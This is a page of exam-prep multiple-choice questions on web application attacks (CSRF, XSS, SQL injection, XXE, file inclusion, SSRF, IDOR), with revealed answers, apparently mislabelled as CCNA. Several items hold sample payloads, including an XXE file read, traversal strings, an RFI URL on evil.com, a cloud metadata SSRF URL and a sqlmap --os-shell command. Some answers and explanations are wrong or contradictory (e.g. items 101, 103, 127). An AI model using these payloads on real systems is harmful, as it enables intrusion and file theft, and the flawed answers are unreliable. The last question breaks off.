CCNA Web Application and Injection Attacks Questions

75 of 172 questions · Page 2/3 · Web Application and Injection Attacks · Answers revealed

76
MCQmedium

Which of the following is a recommended defense against Cross-Site Request Forgery (CSRF) attacks?

A.Enabling directory listing on the web server
B.Implementing CSRF tokens in forms
C.Using a same-origin policy with CORS headers
D.Setting the HttpOnly flag on cookies
AnswerB

CSRF tokens prevent forged requests.

Why this answer

CSRF tokens are unique per request and verified by the server, making forged requests invalid without the token.

77
MCQmedium

A web application uses user input in the following PHP code: include($_GET['page'] . '.php');. An attacker submits the URL: http://example.com/index.php?page=../../../../etc/passwd%00. Which two vulnerabilities are being attempted?

A.RFI and command injection
B.LFI and null byte injection
C.SQL injection and XSS
D.Directory traversal and IDOR
AnswerB

Directory traversal allows including local files, and null byte injection attempts to bypass the appended extension.

Why this answer

The attacker is using '../' for directory traversal to access files outside the web root, and a null byte injection (%00) to truncate the '.php' extension. This targets LFI (local file inclusion) via directory traversal.

78
MCQmedium

Which of the following is the most effective defense against SQL injection attacks?

A.Parameterized queries
B.Escaping all user input
C.Input validation using blacklists
D.Stored procedures
AnswerA

Parameterized queries (prepared statements) separate SQL logic from data, effectively preventing SQL injection.

Why this answer

Parameterized queries (prepared statements) ensure user input is treated as data, not executable code, preventing SQL injection.

79
Multi-Selecthard

Which TWO of the following are valid methods to exploit or test for Server-Side Request Forgery (SSRF)?

Select 2 answers
A.Injecting SQL commands into input fields
B.Using the file:// protocol to read local files
C.Submitting a URL pointing to http://127.0.0.1/admin
D.Sending a payload that includes <script>alert(1)</script>
E.Submitting a URL targeting http://169.254.169.254/latest/meta-data/
AnswersC, E

Accessing internal services via loopback is classic SSRF.

Why this answer

SSRF can be tested by making the server fetch internal resources like localhost or cloud metadata endpoints (e.g., AWS).

80
MCQmedium

A web application allows users to submit feedback that is stored in a database and displayed to other users without proper sanitization. A tester inputs '<script>alert(1)</script>' and it executes when other users view the feedback. Which type of XSS is this?

A.Self-XSS
B.DOM-based XSS
C.Stored XSS
D.Reflected XSS
AnswerC

The script is stored on the server and executed for every user viewing the feedback, which is stored XSS.

Why this answer

The payload is stored in the database and executed when other users load the page, which is stored (persistent) XSS.

81
MCQmedium

A web application uses XML to transmit data between client and server. A tester submits the following payload: '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><root>&xxe;</root>'. The application returns the content of the /etc/passwd file in the response. Which vulnerability is present?

A.SQL injection
B.XML External Entity (XXE) injection
C.Command injection
D.Cross-Site Scripting (XSS)
AnswerB

XXE exploits XML parsers to include external entities, often to read files or perform SSRF.

Why this answer

This is an XML External Entity (XXE) injection, where an external entity is used to read a local file and return its contents.

82
Multi-Selecthard

Which THREE of the following are effective mitigations against brute force attacks on web application login forms? (Select 3)

Select 3 answers
A.Account lockout after failed attempts
B.Implementing CAPTCHA
C.Rate limiting on login endpoints
D.Enforcing strong password policies
E.Using HTTP basic authentication
AnswersA, B, C

Locking accounts after a few failures prevents further attempts.

Why this answer

Account lockout, rate limiting, and CAPTCHA all hinder automated brute force attempts. Strong password policies help but are not a direct mitigation against brute force rate.

83
MCQmedium

A security analyst notices that a web application returns different HTTP responses for valid and invalid usernames during login. Which attack is this behavior most likely facilitating?

A.Username enumeration
B.Cross-site scripting (XSS)
C.Directory traversal
D.SQL injection
AnswerA

Different responses for valid vs invalid usernames allow an attacker to enumerate valid accounts.

Why this answer

The difference in responses (e.g., 'User not found' vs 'Invalid password') allows an attacker to enumerate valid usernames, which is a common first step in credential stuffing or brute-force attacks.

84
Multi-Selecthard

A security engineer is reviewing web server logs and finds the following request: GET /files/../../../etc/passwd HTTP/1.1. Which THREE attacks could be associated with this request? (Choose THREE.)

Select 3 answers
A.Directory traversal
B.File disclosure
C.SQL injection
D.Command injection
E.Local File Inclusion (LFI)
AnswersA, B, E

The ../ patterns indicate traversal out of the web root.

Why this answer

The request uses path traversal to access /etc/passwd (directory traversal/LFI). It can be used for file disclosure, and if the file is included in a script, it could be LFI. Command injection is not related.

85
MCQmedium

During a web application test, an analyst intercepts a request containing a 'Referer' header that points to a different domain. The analyst modifies the request by removing the 'Referer' header and the action still executes successfully. Which type of attack is the analyst testing?

A.Server-Side Request Forgery (SSRF)
B.Clickjacking
C.Cross-Site Request Forgery (CSRF)
D.Cross-Site Scripting (XSS)
AnswerC

CSRF defenses often use Referer checks; bypassing them indicates vulnerability.

Why this answer

CSRF protection often relies on checking the Referer header; if it can be removed or spoofed, the application is vulnerable to CSRF.

86
MCQeasy

Which Burp Suite tool is specifically designed to automate customized attacks against web applications, such as brute-forcing login credentials or fuzzing parameters?

A.Repeater
B.Scanner
C.Intruder
D.Proxy
AnswerC

Intruder performs automated attacks with payloads and positions.

Why this answer

Burp Intruder is used for automating customized attacks, including brute force and fuzzing.

87
MCQhard

A penetration tester intercepts the following request using Burp Suite: POST /change_password HTTP/1.1 Host: example.com Cookie: sessionid=abc123; SameSite=Lax Content-Type: application/x-www-form-urlencoded new_password=Hacker123 The tester successfully crafts a CSRF attack by embedding a hidden form in a malicious page. Which mitigation is most likely missing?

A.SameSite=Strict
B.HTTPOnly flag
C.Secure flag
D.CSRF token
AnswerD

A CSRF token would prevent the attack because the malicious site cannot guess the token.

Why this answer

The presence of a SameSite cookie set to Lax does not prevent CSRF for state-changing requests like password change if the attack uses a GET or POST from a top-level navigation. However, the primary missing mitigation is a CSRF token, which is a unique unpredictable value tied to the session and validated by the server.

88
Multi-Selectmedium

A security analyst identifies that a web application is vulnerable to Server-Side Request Forgery (SSRF). Which TWO of the following are effective mitigation techniques for SSRF?

Select 2 answers
A.Disable unnecessary URL schemas (e.g., file://, dict://)
B.Use a blacklist to block private IP ranges
C.Increase the timeout for HTTP requests
D.Implement an allowlist of permitted URLs or IP addresses
E.Encode user input in base64 before passing to URL functions
AnswersA, D

Disabling unused schemas limits the protocols an attacker can abuse.

Why this answer

Whitelisting allowed domains prevents requests to arbitrary targets. Disabling unused URL schemas (e.g., file://) reduces attack surface. Input validation alone is insufficient.

89
MCQeasy

Which of the following describes the difference between reflected and stored (persistent) cross-site scripting (XSS)?

A.Reflected XSS is a server-side vulnerability, while stored XSS is a client-side vulnerability
B.Reflected XSS is non-persistent and requires user interaction, while stored XSS is persistent and can affect multiple users
C.Reflected XSS only works with HTTP POST requests, while stored XSS works with GET requests
D.Reflected XSS is triggered by the server, while stored XSS is triggered by the client
AnswerB

Reflected XSS does not persist; it appears in the response of a crafted link. Stored XSS remains on the server and infects any user viewing the page.

Why this answer

Reflected XSS is injected via the current request (e.g., URL parameter) and the script reflects immediately in the response. Stored XSS is saved on the server (e.g., in a database) and executed when other users view the affected page.

90
MCQhard

A web application uses XML to transfer data. An attacker submits the following payload: '<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><root>&xxe;</root>'. What vulnerability is being exploited?

A.XML External Entity (XXE) injection
B.Directory traversal
C.Server-Side Request Forgery (SSRF)
D.Command injection
AnswerA

The DOCTYPE declaration with an external entity reading a file is classic XXE.

Why this answer

This is an XML External Entity (XXE) injection attack, where an external entity is defined to read local files.

91
MCQmedium

A security analyst observes that after a user submits a comment on a blog, the comment is displayed immediately on the page without sanitization. Another user visits the page and the comment's JavaScript executes in their browser. Which type of XSS attack is this?

A.DOM-based XSS
B.Reflected XSS
C.Self-XSS
D.Stored XSS
AnswerD

The comment is stored and executed for all users.

Why this answer

The comment is stored on the server and executed when other users view the page, which is the definition of stored (persistent) XSS.

92
MCQhard

A penetration tester uses SQLMap with the following command: sqlmap -u 'http://target.com/page.php?id=1' --batch --dbs. Which database enumeration technique is SQLMap using by default?

A.Out-of-band SQL injection
B.Blind SQL injection
C.Time-based SQL injection
D.In-band SQL injection
AnswerD

By default, SQLMap uses in-band (UNION and error-based) techniques.

Why this answer

Without specifying a technique, SQLMap defaults to using in-band (UNION) and error-based techniques, which are all in-band.

93
MCQeasy

Which of the following is the primary purpose of using a CSRF token in a web application?

A.Prevent cross-site request forgery
B.Prevent session hijacking
C.Prevent XSS
D.Prevent SQL injection
AnswerA

CSRF tokens specifically prevent CSRF by ensuring request authenticity.

Why this answer

CSRF tokens are unique, unpredictable values embedded in forms or requests that validate the request originated from the legitimate application, preventing cross-site request forgery attacks.

94
MCQmedium

An organization wants to prevent directory listing on its Apache web server. Which of the following configuration changes would achieve this?

A.Set 'AllowOverride None'
B.Set 'ServerSignature Off'
C.Set 'Options -Indexes' in the httpd.conf or .htaccess file
D.Set 'DirectoryIndex disabled'
AnswerC

The Indexes option controls directory listing; removing it disables listing.

Why this answer

Disabling the Indexes option in the Directory directive prevents Apache from listing directory contents when no index file exists.

95
MCQhard

An attacker exploits a vulnerable parameter in a web application by submitting the following payload: http://target.com/page.php?file=http://evil.com/shell.txt. The server returns the contents of the remote file. This is an example of which type of attack?

A.Directory traversal
B.Local File Inclusion (LFI)
C.Command injection
D.Remote File Inclusion (RFI)
AnswerD

The payload uses a remote URL, indicating RFI.

Why this answer

Remote File Inclusion (RFI) allows an attacker to include a remote file, often leading to arbitrary code execution if the included file contains PHP or other executable code. The 'file' parameter is used to include a remote resource.

96
Multi-Selecthard

Which THREE of the following are types of SQL injection attacks? (Choose 3)

Select 3 answers
A.Out-of-band SQLi (e.g., DNS or HTTP exfiltration)
B.Stored SQLi
C.In-band SQLi (error-based or union-based)
D.Blind (inferential) SQLi (boolean- or time-based)
E.Reflected SQLi
AnswersA, C, D

Out-of-band uses a different channel (e.g., DNS) to receive data.

Why this answer

Out-of-band SQLi (option A) is correct because it uses a different channel (e.g., DNS or HTTP requests) to exfiltrate data when the attacker cannot receive direct responses from the database. This technique is effective when the database server can initiate outbound network connections, allowing data to be sent to an attacker-controlled server via DNS queries or HTTP requests.

Exam trap

EC-Council often tests candidates by mixing SQL injection categories with XSS terminology (stored/reflected) to see if they confuse web attack types; the trap here is that 'stored' and 'reflected' are not SQLi types but XSS variants.

97
MCQmedium

An analyst observes the following log entry on a web server: GET /../../etc/passwd HTTP/1.1 200. Which type of attack is indicated?

A.Directory traversal
B.SSRF
C.LFI
D.Command injection
AnswerA

The use of '../' to access files outside the web root is directory traversal.

Why this answer

The log shows a request attempting to traverse directories using '../' to access a sensitive system file (/etc/passwd), which is directory traversal.

98
Multi-Selectmedium

A penetration tester is assessing a web application and wants to manually test for SQL injection vulnerabilities. Which TWO tools or techniques are best suited for this task?

Select 2 answers
A.Burp Suite
B.SQLMap
C.OWASP ZAP
D.Nikto
E.Nmap
AnswersA, B

Burp Suite's Repeater and Intruder are excellent for manual SQLi testing.

Why this answer

Burp Suite allows manual intercept and modification of requests to inject SQL payloads. SQLMap automates SQL injection detection and exploitation. Nikto is a web server scanner, not specific to SQLi.

Nmap is a network scanner. OWASP ZAP is a web app scanner similar to Burp but less manual.

99
Multi-Selecteasy

Which TWO of the following are characteristics of stored (persistent) XSS?

Select 2 answers
A.The attack requires the victim to click a crafted link
B.The payload is reflected immediately in the response
C.The malicious script is stored on the server (e.g., in a database)
D.The attack only works if the victim is logged in
E.The attack can affect multiple users without direct interaction
AnswersC, E

Stored XSS persists on the server.

Why this answer

Stored XSS involves malicious script being permanently stored on the server and executed whenever the stored content is accessed. It does not require a crafted link, and it can affect multiple users.

100
MCQhard

A security team discovers that their web application is vulnerable to a Server-Side Request Forgery (SSRF) attack. Which of the following is the MOST effective mitigation technique to prevent SSRF?

A.Implement a whitelist of allowed domains and IP addresses for outbound requests
B.Use input validation to block URLs containing '127.0.0.1' or 'localhost'
C.Implement CSRF tokens on all forms
D.Disable unnecessary HTTP methods on the web server
AnswerA

Whitelisting is a strong control that prevents the server from making requests to unapproved destinations.

Why this answer

Whitelisting allowed domains and IP addresses is the most effective SSRF mitigation because it restricts the server from making requests to arbitrary external or internal resources.

101
MCQhard

An attacker sends a request to a web server with the following header: X-Forwarded-For: 127.0.0.1. The server processes the request as if it came from localhost and grants administrative access. This is an example of:

A.HTTP request smuggling
B.IDOR (Insecure Direct Object Reference)
C.Clickjacking
D.Server-Side Request Forgery (SSRF)
AnswerD

SSRF can be exploited by spoofing internal IPs to bypass access controls.

Why this answer

The attacker manipulates the X-Forwarded-For header to spoof the client IP, which can lead to SSRF or IP-based access control bypass.

102
MCQeasy

Which of the following is a primary defense against SQL injection attacks?

A.Prepared statements
B.HTTPS encryption
C.Input blacklisting
D.Output encoding
AnswerA

Parameterized queries separate SQL logic from data, preventing injection.

Why this answer

Prepared statements with parameterized queries ensure user input is treated as data, not executable SQL code.

103
Multi-Selecthard

Which THREE of the following are common indicators of an SQL injection attack? (Choose 3.)

Select 3 answers
A.Frequent 302 redirects to login pages
B.Multiple failed connection attempts in server logs
C.Unexpected rows or columns in query results
D.Unusually slow database responses
E.Database error messages in the application response
AnswersC, D, E

Union-based injection often adds extra rows or columns to the output.

Why this answer

SQL injection often causes slow queries due to heavy operations (e.g., UNION, subqueries), unexpected rows in output, and database error messages revealing syntax details. D. and E. are not typical indicators; redirects are not SQLi specific, and dropped connections could be network issues.

104
MCQmedium

A penetration tester needs to perform a brute-force attack on a web application login form. Which Burp Suite tool is specifically designed for automating parameterized attacks like password guessing?

A.Repeater
B.Scanner
C.Intruder
D.Proxy
AnswerC

Intruder automates parameterized attacks with payloads.

Why this answer

Burp Suite Intruder is specifically designed for automating parameterized attacks, such as brute-forcing login credentials, by allowing the tester to define payload positions and iterate through a list of values (e.g., passwords) against a target endpoint. Unlike other tools in Burp Suite, Intruder supports multiple attack types (Sniper, Battering Ram, Pitchfork, Cluster Bomb) and can handle rate limiting and session handling, making it ideal for password guessing.

Exam trap

EC-Council often tests the misconception that Repeater can be used for brute-forcing because it can resend requests, but Repeater lacks the automated payload iteration and response analysis features that Intruder provides.

How to eliminate wrong answers

Option A is wrong because Repeater is used for manually resending and modifying individual HTTP requests to observe responses, not for automating multiple iterations of parameterized attacks. Option B is wrong because Scanner is designed for automated vulnerability detection (e.g., SQL injection, XSS) and does not support custom payload lists or brute-force sequencing. Option D is wrong because Proxy is an intercepting proxy that captures and forwards traffic between the browser and target, but it lacks the automation and payload iteration capabilities required for brute-force attacks.

105
MCQhard

A security engineer observes that an internal web application uses XML to transmit data between systems. The engineer discovers that by sending a crafted XML payload, they can read sensitive files from the server's filesystem. Which attack is being performed?

A.SSRF
B.Command injection
C.XXE injection
D.XPath injection
AnswerC

XXE injection exploits XML parsers that process external entities, allowing file disclosure.

Why this answer

XXE (XML External Entity) injection allows reading files via external entities in XML.

106
MCQeasy

A web application allows users to view documents by specifying a filename in the URL, e.g., /getDocument?file=report.pdf. A tester changes the file parameter to '../../etc/passwd' and retrieves the system password file. Which vulnerability is being exploited?

A.Local File Inclusion (LFI)
B.Directory traversal
C.Remote File Inclusion (RFI)
D.Command injection
AnswerB

Directory traversal exploits insufficient input validation to access arbitrary files.

Why this answer

Directory traversal (path traversal) occurs when user input is used to access files outside the intended directory. The use of '../' sequences indicates directory traversal.

107
Multi-Selecteasy

A web application tester encounters a parameter that is reflected in the response without sanitization. The tester suspects XSS. Which TWO types of XSS could be present in this scenario? (Choose TWO.)

Select 2 answers
A.DOM-based XSS
B.Reflected XSS
C.Self-XSS
D.Stored (persistent) XSS
E.Blind XSS
AnswersA, B

If the client-side JavaScript uses the parameter unsafely, it could be DOM-based.

Why this answer

Reflected XSS occurs when the input is immediately reflected in the response. DOM-based XSS occurs when client-side JavaScript processes the input unsafely. Stored XSS requires data to be saved on the server, which is not indicated here.

108
MCQmedium

A security analyst notices that a web application returns different error messages for valid and invalid usernames during login. Which type of attack is this application MOST vulnerable to?

A.Directory traversal
B.Username enumeration
C.SQL injection
D.Cross-site scripting (XSS)
AnswerB

Different responses for valid vs invalid usernames directly enable username enumeration, a form of information disclosure.

Why this answer

The different error messages allow an attacker to enumerate valid usernames, which is a common precursor to brute-force or credential-stuffing attacks.

109
MCQhard

A penetration tester is testing an IIS web server and wants to exploit a WebDAV misconfiguration to upload a web shell. Which HTTP method should the tester check to determine if WebDAV is enabled and allows file uploads?

A.OPTIONS
B.MOVE
C.PUT
D.PROPFIND
AnswerA

OPTIONS returns the list of allowed methods, revealing if PUT or other WebDAV methods are enabled.

Why this answer

The OPTIONS method queries the server for supported HTTP methods. If WebDAV is enabled, the response will include methods like PUT, DELETE, PROPFIND, etc. PUT is used for upload, but OPTIONS first confirms availability.

110
MCQhard

A web application uses a parameter 'file' to include server-side files. The following request is intercepted: GET /page.php?file=../../../etc/passwd HTTP/1.1. The response contains the contents of /etc/passwd. This vulnerability is most likely which of the following?

A.Local File Inclusion (LFI)
B.Directory Traversal
C.Command Injection
D.Remote File Inclusion (RFI)
AnswerB

Using ../ to navigate directories to access restricted files is directory traversal.

Why this answer

The request uses path traversal sequences (../) to include a file outside the web root, which is a classic path traversal (directory traversal) vulnerability.

111
MCQhard

During a web application assessment, a tester intercepts a request and modifies the 'Referer' header. The application then performs a state-changing action without requiring a token. Which vulnerability is most likely present?

A.Cross-site scripting (XSS)
B.Server-side request forgery (SSRF)
C.Cross-site request forgery (CSRF)
D.Clickjacking
AnswerC

CSRF occurs when the application does not verify the request's legitimacy, allowing an attacker to forge requests on behalf of an authenticated user.

Why this answer

Cross-Site Request Forgery (CSRF) attacks rely on the application not verifying the origin of the request; a missing CSRF token and lack of Referer validation make the application vulnerable.

112
MCQeasy

A web application tester uses the following Burp Suite feature to automatically send multiple requests with different payloads to test for common vulnerabilities. Which feature is being used?

A.Intruder
B.Repeater
C.Proxy
D.Scanner
AnswerA

Intruder automates sending many requests with variable payloads for vulnerability testing.

Why this answer

Burp Intruder is designed for automated request customization and repetition, allowing fuzzing of parameters for injection flaws, brute-force attacks, and other vulnerability testing.

113
Multi-Selecteasy

Which TWO of the following are common methods to detect SQL injection vulnerabilities in a web application? (Select 2)

Select 2 answers
A.Reviewing the robots.txt file for hidden directories
B.Scanning with a vulnerability scanner like Nikto
C.Submitting a single quote (') and observing error messages
D.Checking for XSS payloads in input fields
E.Using boolean-based payloads and observing page content differences
AnswersC, E

A single quote often breaks the SQL query, leading to database errors that reveal injection points.

Why this answer

Using single quotes to cause errors and timing delays are classic SQLi detection techniques.

114
MCQmedium

A penetration tester discovers that a web application's search functionality reflects user input directly in the page source without sanitization. The tester crafts a URL like http://example.com/search?q=<script>alert('XSS')</script> and the script executes. This is an example of which type of XSS?

A.Stored (persistent) XSS
B.Blind XSS
C.DOM-based XSS
D.Reflected XSS
AnswerD

The payload is part of the request and is reflected back in the response, which is characteristic of reflected XSS.

Why this answer

Reflected XSS occurs when user input is immediately returned by the server in the response, without being stored, and the example shows the payload in the URL parameter.

115
MCQeasy

Which of the following tools is specifically designed to automate the detection and exploitation of SQL injection vulnerabilities in web applications?

A.Burp Suite
B.Nikto
C.Metasploit
D.SQLMap
AnswerD

SQLMap is dedicated to automating SQL injection detection and exploitation.

Why this answer

SQLMap is a well-known open-source tool that automates the process of detecting and exploiting SQL injection vulnerabilities. Burp Suite is a web proxy and scanner, Nikto is a web server scanner, and Metasploit is a penetration testing framework with broader capabilities.

116
MCQhard

A penetration tester uses SQLMap with the option '--technique=T --dbms=MySQL --level=5 --risk=3' against a login form. The tool returns results after a delay of several seconds per request. Which SQL injection technique is being used?

A.Out-of-band SQL injection
B.Time-based blind SQL injection
C.Error-based SQL injection
D.Boolean-based blind SQL injection
AnswerB

The technique flag 'T' indicates time-based blind injection, which relies on response time delays.

Why this answer

The 'T' in --technique stands for Time-based blind SQL injection. The delay indicates time-based injection where the database sleeps to cause a response delay.

117
MCQmedium

During a penetration test, a security analyst discovers that a web application uses sequential numeric identifiers in URLs (e.g., /profile?id=100). By modifying the id parameter, the analyst can access another user's profile data without authorization. Which vulnerability is being exploited?

A.SQL injection
B.Insecure Direct Object Reference (IDOR)
C.Server-Side Request Forgery (SSRF)
D.Cross-Site Request Forgery (CSRF)
AnswerB

The ability to change a parameter like 'id' to access another user's data is a classic IDOR vulnerability.

Why this answer

IDOR (Insecure Direct Object Reference) occurs when an application exposes internal object references (e.g., database keys) and fails to enforce proper access controls, allowing users to manipulate them to access unauthorized data.

118
MCQmedium

A security analyst is reviewing HTTP response headers and notices the following: Set-Cookie: sessionId=abc123; SameSite=Lax. What is the primary purpose of the SameSite attribute?

A.To enforce HTTPS for cookie transmission
B.To prevent the cookie from being accessed by JavaScript
C.To mitigate cross-site request forgery (CSRF) attacks
D.To ensure the cookie is only sent over HTTP and not FTP
AnswerC

SameSite restricts cookie sending to same-site requests, reducing CSRF risk.

Why this answer

SameSite=Lax prevents the browser from sending the cookie in cross-site requests initiated by third-party websites, mitigating CSRF attacks.

119
MCQeasy

Which Burp Suite tool is specifically designed to automate customized attacks on web applications, such as brute-forcing login forms or fuzzing parameters?

A.Repeater
B.Proxy
C.Scanner
D.Intruder
AnswerD

Intruder is designed for automated customized attacks, supporting payloads and various attack types.

Why this answer

Burp Intruder is the tool for automating customized attacks like brute-forcing and fuzzing.

120
MCQmedium

A web application allows users to submit feedback that is stored in a database and later displayed to administrators. An attacker submits feedback containing <script>alert('stored')</script>. When an admin views the feedback page, the script executes. Which type of XSS is this?

A.Blind XSS
B.Reflected XSS
C.Stored XSS
D.DOM-based XSS
AnswerC

The script is stored in the database and executed when loaded by an admin, classic stored XSS.

Why this answer

Stored (persistent) XSS occurs when the payload is stored on the server and served to other users later.

121
MCQmedium

A penetration tester discovers that a web application includes the following code: 'include($_GET['page'] . '.php');' and the application is running on a Linux server. The tester attempts to exploit this by accessing 'index.php?page=../../etc/passwd'. What type of attack is this, and will it succeed?

A.Directory traversal; it will succeed because '../' bypasses restrictions
B.Remote File Inclusion (RFI); it will succeed because the parameter is not filtered
C.Command injection; it will succeed if the server interprets PHP code
D.Local File Inclusion (LFI); it will not succeed because the '.php' extension is appended
AnswerD

LFI includes local files, but the appended '.php' extension prevents direct file reading unless a null byte or other technique is used.

Why this answer

This is a Local File Inclusion (LFI) vulnerability. The appended '.php' extension prevents reading '/etc/passwd' because the file would be interpreted as '/etc/passwd.php', which does not exist.

122
MCQmedium

An analyst notices that a web application's login page returns a generic 'Invalid credentials' message regardless of whether the username is valid. This is an example of which security control?

A.Anti-CSRF token
B.Account lockout policy
C.Generic error messages
D.Rate limiting
AnswerC

Using the same error message for both invalid username and invalid password prevents attackers from distinguishing valid users.

Why this answer

Providing generic error messages prevents attackers from enumerating valid usernames, which is a common mitigation against brute-force attacks.

123
MCQmedium

A security analyst observes that a web application's login page responds with different HTTP status codes and response times for valid versus invalid usernames. This information leakage could be used to perform which type of authentication attack?

A.Username enumeration
B.Credential stuffing
C.Password spraying
D.Brute force attack
AnswerA

The behavior of differing responses for valid vs invalid usernames is classic username enumeration.

Why this answer

Username enumeration occurs when an application reveals whether a username exists, often through differing error messages or response times. This information can be leveraged for brute force or password spraying attacks by focusing on valid usernames.

124
MCQmedium

A penetration tester uses a tool to intercept and modify HTTP/HTTPS requests in real-time between the browser and the web application. Which tool is being used?

A.SQLMap
B.Burp Suite Proxy
C.Nmap
D.Metasploit
AnswerB

Burp Suite Proxy is designed for intercepting and modifying web traffic.

Why this answer

Burp Suite's Proxy module allows interception and modification of HTTP/HTTPS traffic. Repeater is for resending requests, Intruder for automated attacks, Scanner for vulnerability scanning.

125
Multi-Selecthard

Which THREE of the following are types of SQL injection attacks? (Select 3)

Select 3 answers
A.DOM-based SQL injection
B.Stored SQL injection
C.Blind SQL injection (boolean-based, time-based)
D.In-band SQL injection (error-based, union-based)
E.Out-of-band SQL injection
AnswersC, D, E

Blind infers results without direct output.

Why this answer

Option C is correct because blind SQL injection is a recognized type of SQL injection attack where the attacker does not receive direct error messages or data from the database but instead infers information by observing the application's response (boolean-based) or by causing time delays (time-based). This technique is commonly used when the application is configured to suppress error output, forcing the attacker to rely on side-channel behaviors.

Exam trap

The trap here is that candidates often confuse 'DOM-based' (an XSS attack) with a SQL injection type, or mistakenly think 'Stored SQL injection' is a primary category, when the CEH exam strictly recognizes in-band, blind, and out-of-band as the three main types of SQL injection attacks.

126
MCQhard

During a penetration test, a tester uses SQLMap with the following command: 'sqlmap -u "http://target.com/page?id=1" --os-shell'. The target is a Linux server running MySQL. Which SQL injection technique will SQLMap likely attempt to use to achieve an OS shell?

A.Error-based injection
B.In-band (file write via INTO OUTFILE)
C.Blind boolean-based injection
D.Union-based injection
AnswerB

SQLMap uses the INTO OUTFILE clause to write a webshell to the filesystem, which is an in-band technique requiring file write privileges.

Why this answer

SQLMap's --os-shell option typically uses the 'INTO OUTFILE' clause to write a backdoor webshell onto the server, requiring file write privileges. This is an in-band technique.

127
MCQeasy

Which of the following is a common defense against clickjacking attacks?

A.CSRF tokens
B.Content Security Policy (CSP) with 'frame-ancestors' directive
C.SameSite cookies
D.Input validation
AnswerB

CSP 'frame-ancestors' is also effective, but the most common is X-Frame-Options.

Why this answer

The X-Frame-Options header (e.g., DENY or SAMEORIGIN) prevents the page from being displayed in a frame, mitigating clickjacking.

128
MCQmedium

A security analyst notices that a web application uses sequential numeric IDs for user accounts (e.g., /profile?id=1001). By changing the ID to 1002, the analyst can view another user's profile. Which vulnerability is present?

A.SQL injection
B.IDOR
C.Directory traversal
D.CSRF
AnswerB

IDOR occurs when an application exposes direct references to internal objects without proper access control.

Why this answer

This is an IDOR (Insecure Direct Object Reference) vulnerability, where direct access to objects is not properly restricted.

129
MCQeasy

Which of the following is a common indicator of a stored (persistent) Cross-Site Scripting (XSS) attack?

A.A script executes in the victim's browser without any server interaction
B.A script is permanently stored on the server and executed when users view a page
C.A script is executed when a user submits a form with malicious input
D.A script executes only after clicking a manipulated URL
AnswerB

Stored XSS persists on the server and affects all users viewing the content.

Why this answer

Option B is correct because stored (persistent) XSS occurs when malicious script is permanently stored on the server (e.g., in a database, comment field, or forum post) and is served to every user who views the affected page. The script executes in the victim's browser without requiring any additional interaction, as it is part of the page's HTML response from the server.

Exam trap

The trap here is that candidates confuse stored XSS with reflected XSS, mistakenly thinking that any script execution without user interaction (Option A) is stored XSS, when in fact stored XSS specifically requires the payload to be persisted on the server and served to multiple users.

How to eliminate wrong answers

Option A is wrong because it describes reflected XSS or DOM-based XSS, where the script executes without server interaction (e.g., via client-side JavaScript manipulation), but stored XSS requires the server to serve the stored payload. Option C is wrong because it describes a reflected XSS scenario where the script executes immediately upon form submission, not after being stored and later retrieved. Option D is wrong because it describes reflected XSS where the payload is in a manipulated URL and executes only after the victim clicks that link, not a persistent server-side storage.

130
MCQeasy

Which of the following is the BEST defense against Cross-Site Request Forgery (CSRF) attacks?

A.SameSite cookies
B.Input validation
C.Output encoding
D.CSRF tokens
AnswerD

CSRF tokens are the standard, most effective defense.

Why this answer

CSRF tokens are unique, unpredictable tokens that validate that requests originate from the legitimate site, effectively mitigating CSRF.

131
MCQmedium

A penetration tester finds that a web application includes files based on user input without proper validation. The tester supplies 'http://attacker.com/malicious.txt' and the application includes its content. Which vulnerability is this?

A.Directory traversal
B.Remote File Inclusion (RFI)
C.Local File Inclusion (LFI)
D.Server-Side Request Forgery (SSRF)
AnswerB

The application includes a remote file via HTTP, which is RFI.

Why this answer

Including a remote file from an attacker-controlled server is Remote File Inclusion (RFI).

132
Multi-Selecthard

A pentester uses Burp Suite's Intruder to perform a brute-force attack on a login form. Which THREE of the following Intruder attack types would be appropriate for testing different payload combinations?

Select 3 answers
A.Pitchfork
B.Sniper
C.Direct
D.Cluster bomb
E.Battering ram
AnswersB, D, E

Sniper is used for single payload set, iterating over positions.

Why this answer

Sniper uses one payload set and iterates over positions sequentially. Battering ram uses one payload set for all positions simultaneously. Pitchfork uses multiple payload sets in parallel but each set must have the same number of payloads.

Cluster bomb uses multiple payload sets and tries all combinations.

133
Multi-Selectmedium

During a web application penetration test, a tester discovers a file inclusion vulnerability. Which THREE of the following are potential impacts or exploitation scenarios? (Choose THREE.)

Select 3 answers
A.Disclosure of sensitive files like /etc/passwd
B.Remote code execution via log poisoning
C.Port scanning of internal network hosts
D.Denial of service by including large files
E.Session hijacking by including session files
AnswersA, B, E

LFI allows reading arbitrary files on the server.

Why this answer

LFI can lead to remote code execution (via log poisoning), local file disclosure (e.g., /etc/passwd), and session hijacking (by including session files). Port scanning is not a direct impact of file inclusion.

134
MCQmedium

A web developer wants to mitigate CSRF attacks. Which of the following configurations for cookies is most effective when combined with CSRF tokens?

A.HttpOnly flag
B.SameSite=Strict
C.Domain attribute
D.Secure flag
AnswerB

SameSite=Strict blocks cookies on cross-site requests, mitigating CSRF.

Why this answer

SameSite=Strict prevents the browser from sending cookies for cross-site requests, which blocks CSRF attacks.

135
MCQmedium

Which of the following is the most effective defense against Cross-Site Request Forgery (CSRF) attacks?

A.Content Security Policy (CSP)
B.CSRF tokens
C.Rate limiting
D.Input validation
AnswerB

CSRF tokens are the primary defense against CSRF attacks.

Why this answer

CSRF tokens are the most effective defense because they are unique, unpredictable values embedded in each form or request that the server validates. Without a valid token, the server rejects the request, preventing an attacker from forging a legitimate user's action even if the victim is authenticated.

Exam trap

EC-Council often tests the misconception that input validation or CSP can prevent CSRF, when in fact CSRF exploits the browser's automatic inclusion of credentials (cookies) and requires a server-side token or SameSite cookie attribute to verify request intent.

How to eliminate wrong answers

Option A is wrong because Content Security Policy (CSP) is primarily designed to mitigate XSS and data injection attacks by controlling resource loading, not to validate the origin or authenticity of state-changing requests. Option C is wrong because rate limiting only reduces the speed of repeated attacks but does not prevent a single forged request from being executed. Option D is wrong because input validation (e.g., sanitizing or escaping user input) addresses injection attacks like SQLi or XSS, not the lack of origin verification that CSRF exploits.

136
Multi-Selecthard

A penetration tester is performing a check for HTTP response splitting. Which THREE of the following conditions must be present for this attack to succeed?

Select 3 answers
A.The application reflects user input in the HTTP response headers
B.The application reflects user input in the HTTP response body
C.The application uses HTTPS exclusively
D.The attacker can inject multiple header lines to create a second HTTP response
